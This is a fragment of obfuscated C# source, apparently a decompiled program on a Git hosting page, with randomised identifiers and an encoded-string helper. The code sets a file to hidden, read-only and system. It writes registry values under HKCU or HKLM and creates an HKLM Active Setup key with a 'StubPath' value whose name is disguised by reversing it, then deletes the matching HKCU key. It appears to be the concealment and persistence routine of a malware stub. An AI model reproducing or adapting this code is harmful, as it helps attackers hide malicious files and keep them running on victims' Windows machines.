if (this.hyrbz1kfxjvaxj0vistcunjymen3kporm == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.Ajiami1b52zvc3vohgymtmh5a == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (this.R3u01lftwibuhcd22 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
}
this.Myk2onyuqzunnxikmdzm0nc2t(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 95, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("NDLAWVBMC2KZBPWFB5J3JGQNQ"))));
if (!this.cwygyk0oxmm4oly4f)
return;
this.Dsqyxep1xbkqqwuokcmpwlnunygdkudqf();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
private void Ruzxivkrma3hdd1il(
string u0jp0x5zrl0q5ayh3v2w1bp40,
string Ef15akjyi4th4fsci,
string iep4bqxi0rq5itx040ytg2d2x0q13s5of,
int Fzyx2nfbtm3vn3bdgfaytm0sm)
{
this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x = true;
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 1)
Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 2)
Registry.LocalMachine.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm != 3)
return;
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci);
subKey.SetValue(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaPbutS"), (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
subKey.Close();
if (Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, true) == null)
return;
Registry.CurrentUser.DeleteSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, false);
}
private static void Main(string[] args) => new ekrod4bellvfxnmof().fkjhdaxsce2gfuv1fe5y42qsk();
}
}
Reference in New Issue View Git Blame Copy Permalink